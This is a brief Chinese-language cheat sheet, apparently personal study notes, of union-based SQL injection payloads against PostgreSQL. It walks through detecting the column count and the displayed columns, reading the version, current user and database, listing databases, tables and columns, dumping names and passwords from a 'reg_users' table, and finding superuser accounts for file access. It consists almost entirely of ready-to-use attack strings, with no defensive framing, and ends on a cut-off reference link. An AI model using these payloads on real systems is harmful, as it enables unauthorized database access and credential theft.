- 测列数: order by 4 and 1=2 union select null,null,null,null - 测显位:第2,3 and 1=2 union select 'null',null,null,null 错误 and 1=2 union select null,'null',null,null 正常 and 1=2 union select null,null,'null',null 正常 and 1=2 union select null,null,null,'null' 错误 - 获取信息:版本,当前用户,当前数据库名 and 1=2 UNION SELECT null,version(),null,null and 1=2 UNION SELECT null,current_user,null,null and 1=2 union select null,current_database(),null,null - 获取数据库名: and 1=2 union select null,string_agg(datname,','),null,null from pg_database - 获取表名: 1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public' 2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables -获取列名: and 1=2 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users' - 获取数据: and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users - 补充-获取dba用户(同样在DBA用户下,是可以进行文件读写的):(判断是不是管理员账户,查询超级用户) and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper IS TRUE 参考:https:
|